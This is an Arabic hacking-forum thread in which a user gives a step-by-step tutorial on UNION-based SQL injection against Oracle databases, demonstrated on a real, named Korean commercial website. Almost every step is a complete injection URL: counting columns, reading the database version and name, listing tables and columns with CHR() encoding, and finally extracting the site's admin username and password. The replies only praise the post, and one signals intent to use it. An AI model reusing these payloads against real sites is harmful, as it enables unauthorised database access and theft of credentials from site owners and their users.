حالة الموضوع:
مغلق
  1. Fox

    Fox Developer

    الأنتساب:
    ‏27 ديسمبر 2011
    المشاركات:
    81
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    الإقامة:
    ŖĬỹДďҢ
    [​IMG]
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاتة

    الصلاة و السلام على أشرف المرسليـن
    الحمد لله وحده نحمده و نشكره و نستعينه و نستغفره و نعود بالله من شرور أنفسنا و من سيئات أعمالنا
    من يهده الله فلا مظل له و من يظلل فلن تجد له ولياً مرشدا
    و أشهد ألا إلاه إلا الله وحده لا شريك له و أن محمداً عبده و رسوله صلى الله عليه و سلم
    و على آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين

    اليوم سنتكلم عن حقن قواعد البيانات الــــ ORACLE

    ان شاء الله

    [​IMG]

    واقوم بتوضيح الاستعلامات التي نخاطب بها هذا النوع من القواعد ان شاء الله
    وتخطي حيل المبرمجين ونقوم بجلب البيانات المستخرجة حتى وان كانت مخفيه
    وسحاول ابسط الفكره لحقن مثل هذا النوع ان شاء الله نبدأ
    مع العلم هي شبية بحقن قواعد البيانات MySql
    مما يعني طرق التخاطب لا في استعلام الأوامر
    راح انطبق الدرس على هالموقع التالي

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=PHILEO-914UV
    وبالطريقة الروتينية
    وبوضع سنكل كويتث '
    في نهاية الرابط

    [​IMG]

    كما نلاحظ فالصورة من خلال الخطأ الضاهر لدينا تبين ان لنا نوع القاعده هي ORACLE

    طيب نحدد عدد الأعمده بالاستعلام المعروف
    order by
    امر استعلام واضح
    وبالطريقة التقليديه يعني نضل نقلل ليما يختفي الخطأ عندها حددنا عدد الاعمده
    بعد ما حددنا عدد الاعمدة وهي 4

    هنا نقوم بتحديد العمود المصاب عن طريق الاستعلام
    union select
    هنا ما راح نكتب عدد الاعمده بقيمه رقميه راح نعوض عن كل عمود بقيمه فارغه اي نصيه
    اي
    1 = null
    وهكذا
    يعني الاستعلام يكون بهذا الشكل

    كود PHP:
    union select null,null,null,null
    مع الحاق نهايه الحقنه بالأمر الآتي

    كود PHP:
    from%20v$version من اصدار القاعدة هنا ارفقنا هذا الامر لنتعرف على الاعمده المصابه لستكمال استغلالنا
    لنحصل على ما نريد من معلومات
    طيب الاستعلام يصبح بهذا الشكل

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20NULL,NULL,NULL,NULL%20from%20v$version+--+
    لو تلاحظ في الصفحة حق الموقع ماظهرت اي معلومات او عمود مصاب
    طيب في طريقه لأظهار الاعمده بالصفحة نشوف كيفية استخراج الأعمد المصابة
    بستبدال القيمه null بــــــــ '1'
    يعني مكان اول قيمه فارغه نستبدلها بــــــــ '1'
    يعني كل قيمه فارغه نستبدلة برقم و وضع كل رقم مابين علامتي تنصيص
    يعني مكان اول قيمه فارغه نستبدله اذا مشت الحقنه وما ضهر خطأ في الصفحه اذن العمود مصاب واذا ضهر خطأ يعني العمود ليس مصاب انخلي قيمه فارغه
    هذه الطريقه استخدمنها لتحديد الاعمده المصابه
    هنا ماشاء الله الاعمده كله مصابه يعني الحقنه راح اتكون على النحو التالي

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%273%27,%274%27%20from%20v$version+--+
    لو نلاحظ في صفحة الموقع لم تظهر اي بيانات
    طيب هنا صاحب السكربت مخبئ المعلومات في سورس الصور
    طيب كلك يمين على اي صوره بالصفحه ونذهب كما موضح بالصورة

    [​IMG]

    ستضهر لنا مصدر الصور كما في الصورة

    [​IMG]

    كما نلاحظ الاعمده المصابه هنا مخبأه

    الآن لنتعرف على اصدار القاعدة
    نفس الاستعلام السابق ولكن نضع مكان العمود المصابه الامر

    كود PHP:
    BANNER =  هنا استخدمناه لكي تضهر لنا اصدار القاعده يعني كبصمه لاستخراج  المعلومات في مكان العمود المصاب وهذه خاصة في قواعد الاوراكل
    لاحظ الحقنه

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,BANNER,%274%27%20from%20v$version+--+
    [​IMG]

    كما نلاحظ الاصدار واضح بالصورة CORE11.1.0.6.0Production

    الآن نستخرج اسم القاعدة عن طريق وضع

    كود PHP:
     SYS.DATABASE_**** = امر استخراج اسم قاعدة البيانات الخاصة بالاوراكل
    مكان العمود المصاب ثم الحاق اخر الحقنة بالامر
    FROM DUAL 
    هذا جدول نستعين به لاكمال شروط الحقنه اي لجلب المعلومات   باستعلام صحيح وهو جدول انشئته اوراكل بنفسها يتعامل مع قواعد البيانات   لجلب البيانات التاريخ وما شابه هنا راح نستغله لجب اسم القاعده
    لتصبح الحقنة

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,SYS.DATABASE_****,%274%27%20from%20DUAL+--+
    [​IMG]

    كما موضح فالصورة اسم القاعدة HIMSDB

    الآن ننتقل الى اضهار الجداول والحقول معاَ
    عن طريق الاستعلام التالي

    كود PHP:
    (table_****||chr(58)||column_****) امر استعلام واضح كما بينا في دروس سابقة ونضعه مكان العمود المصاب 
    مع الحاق اخر الحقنه بالامر التالي
    from USER_TAB_COLUMNS 
    من اسماء الجداول والاعمده مصطلح خاص بقواعد الاوراكل
    لتصبح الحقنة بهذا الشكل !:"

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_****||chr%2858%29||column_****%29,%274%27%20from%20USER_TAB_COLUMNS+--+
    [​IMG]

    كما نلاحظ في الصورة ضهور اول جدول و أول عمود من قاعدة البيانات

    الآن التنقل الى الجداول البقيه من خلال

    كود PHP:
    تحويل اسم الجدول الى تشفيرة من نوع chr()  الخاصة بقواعد الاوراك
    يعني نحول
    TABLE_
    **** = ORACLE CHR()
    من خلال الأضافه الـــ HackBar
    احدى اضافات الفايرفوكس
    أول جدول ضهر لنا هو AS_FLTR_EXCH_HISY
    بعد ما قمنا بتحويله يصبح

    كود PHP:
    CHR(65) || CHR(83) || CHR(95) || CHR(70) || CHR(76) || CHR(84) ||  CHR(82) || CHR(95) || CHR(69) || CHR(88) || CHR(67) || CHR(72) ||  CHR(95) || CHR(72) || CHR(73) || CHR(83) || CHR(89)
    مع الحاق الحقنة بالامر

    كود PHP:
    Where table_****> = اينما تجد الجدول الفلاني اجلبلي الي بعده او الاكبر منه و هكذا
    لتصبح الحقنه بشكل التالي

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_****||chr%2858%29||column_****%29,%274%27%20from%20USER_TAB_COLUMNS%20where%20table_****%3E%20%20CHR%2865%29%20||%20CHR%2883%29%20||%20CHR%2895%29%20||%20CHR%2870%29%20||%20CHR%2876%29%20||%20CHR%2884%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2869%29%20||%20CHR%2888%29%20||%20CHR%2867%29%20||%20CHR%2872%29%20||%20CHR%2895%29%20||%20CHR%2872%29%20||%20CHR%2873%29%20||%20CHR%2883%29%20||%20CHR%2889%29+--+
    [​IMG]

    كما نلاحظ الجدول الثاني والعمود الأول لجدول الثاني

    لأستخراج الجداول البقية كما اسردنا سابقاَ
    الآن نختصر الطريقه باستخراج جدول اليوزر لاحظ الحقنة

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_****||chr%2858%29||column_****%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_****%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29+--+
    [​IMG]

    كما موضح جدول اليوزر مع ضهور اول عمود لجدول اليوزر
    PL_USER = جدول اليوزر
    ADDR_1 = العمود الآول لجدول اليوزر

    الآن نريد التنقل بين الاعمدة لجدول اليوزر
    نضيف الامر التالي بعد الجدول المشفر بقيمة chr
    and column_****> = اجلبلي العمود الي بعدة
    بنفس الكلام الي فوق نحول اسم العمود الى قيمة chr العمود الاول الي استخرجنا من جدول اليوزر هو ADDR_1

    كود PHP:
    CHR(65) || CHR(68) || CHR(68) || CHR(82) || CHR(95) || CHR(49)  =  اسم العمود بعد التشفير
    لتصبح الحقنة

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_****||chr%2858%29||column_****%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_****%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29%20and%20column_****%3E%20%20CHR%2865%29%20||%20CHR%2868%29%20||%20CHR%2868%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2849%29+--+
    شوف السورس ضهر ثاني عمود
    نختصر على السريع انا استخرجت عمود اليوزر والباسورد لجدول اليوزر
    لاحظ الحقنه
    هذه لليوزر

    كود PHP:
     http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_****||chr%2858%29||column_****%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_****%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29%20and%20column_****%3E%20%20%20CHR%2885%29%20||%20CHR%2883%29%20||%20CHR%2869%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2876%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2869%29%20||%20CHR%2876%29+--+
    وهذه للباسورد

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_****||chr%2858%29||column_****%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_****%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29%20and%20column_****%3E%20%20%20CHR%2885%29%20||%20CHR%2883%29%20||%20CHR%2869%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2878%29%20||%20CHR%2879%29+--+
    كما نلاحظ في الصوره

    [​IMG]

    الآن استخراج بيانات الأعمدة لعمود اليوزر والبسورد من جدول اليوزر
    لاحظ الحقنة بشكل النهائي

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28USER_****||chr%2858%29||USER_PWD%29,%274%27%20from+PL_USER+--+
    كما نلاحظ في الصورة اليوزر والباسورد للادمن

    [​IMG]

    الى هنا ارجو اني قد وفقت في ايصال المعلومة واسف اذا اخطأت في شي
    واعذروني على الاطالة واي استفسار انا حاضر
    في امان الله :{11}:
     
    1 person likes this.
  2. MAX PWORE

    MAX PWORE DeveloPer Plus

    الأنتساب:
    ‏16 سبتمبر 2011
    المشاركات:
    79
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    مصر
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    وعليكم السلام ..
    شرح ولا اروع حبيبي
    واصل ولا تحرمنا من حصرياتك &:":
     
  3. saudi-hack

    saudi-hack Developer

    الأنتساب:
    ‏30 أغسطس 2012
    المشاركات:
    105
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    الإقامة:
    الـــريآضض
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    يعطيك الف عافية يا غالى
     
  4. th3j0cker

    th3j0cker Developer

    الأنتساب:
    ‏28 ديسمبر 2011
    المشاركات:
    58
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    تسلم ايدك يالغالي شرح رائع ​
     
  5. H̷e̷l̷l̷ N̷i̷g̷h̷t̷

    H̷e̷l̷l̷ N̷i̷g̷h̷t̷ Developer

    الأنتساب:
    ‏27 أغسطس 2012
    المشاركات:
    47
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    الإقامة:
    JoRdAn
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    بارك الله فيك
    جاري لقيام بالازم i:q^:
     
  6. H̷e̷l̷l̷ N̷i̷g̷h̷t̷

    H̷e̷l̷l̷ N̷i̷g̷h̷t̷ Developer

    الأنتساب:
    ‏27 أغسطس 2012
    المشاركات:
    47
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    الإقامة:
    JoRdAn
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    ماذا تعتقد في مشاركة Fox؟
    يعجبني ويستحق التقييم :!."​
     
  7. SOME1ONE

    SOME1ONE Developer

    الأنتساب:
    ‏26 مارس 2012
    المشاركات:
    71
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    وعليكم السلام ورحمة الله وبركاته

    مجهود رائع اخي )5:"​
     
  8. Dr.Azoz

    Dr.Azoz Developer

    الأنتساب:
    ‏27 ديسمبر 2011
    المشاركات:
    57
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    |K|S|A|
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    تسلم اخي وبارك الله فيك :{1}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة